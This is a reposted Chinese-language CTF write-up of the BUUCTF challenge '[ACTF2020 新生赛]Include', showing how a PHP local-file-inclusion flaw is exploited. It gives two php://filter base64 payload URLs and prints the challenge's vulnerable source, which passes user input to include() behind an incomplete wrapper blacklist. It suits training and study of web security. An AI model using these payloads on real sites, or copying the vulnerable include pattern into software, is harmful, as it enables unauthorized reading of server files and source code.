微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

Buuctf-Web-[ACTF2020 新生赛]Include

前言

刷题网址:https://buuoj.cn/challenges#[ACTF2020 新生赛]Include


首先打开网页,提示tips点击他,根据题目提示很难不想到是文件包含,但是提示是能找到外面的flag吗,如下图。

image

这里我猜想的是否在上上一个目录,../一个目录,但是无论我输多少都不行。

image

所以这里我转换思路尝试去读取,index.PHP,发现也不行,所以这里我猜想的是,是不是PHP伪协议,关于PHP伪协议的东西可以自行百度查找,这里我使用PHP://filter读取文件,发现读取成功,这里我读取的是index.PHP,读取使用的payload如下,是把文件以base64的方式读取,然后我们拿去网址在线解密。

payload: /?file=PHP://filter/read=convert.base64-encode/resource=index.PHP

解密代码如下,我们可以清晰的看见,如果file里面有这些PHP://input,zip://,phar://,data:就会直接退出程序,并且报错hacker

这里没有过滤PHP://filter所以我们能进来。

<Meta charset="utf8">
<?PHP
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"PHP://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.PHP">tips</a>';
}
?>

既然是这样,我们在尝试读取一下flag.PHP试试,payload如下。

payload: /?file=PHP://filter/read=convert.base64-encode/resource=flag.PHP

然后我们在拿去base64解密,flag就出来了,如下图。

image

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐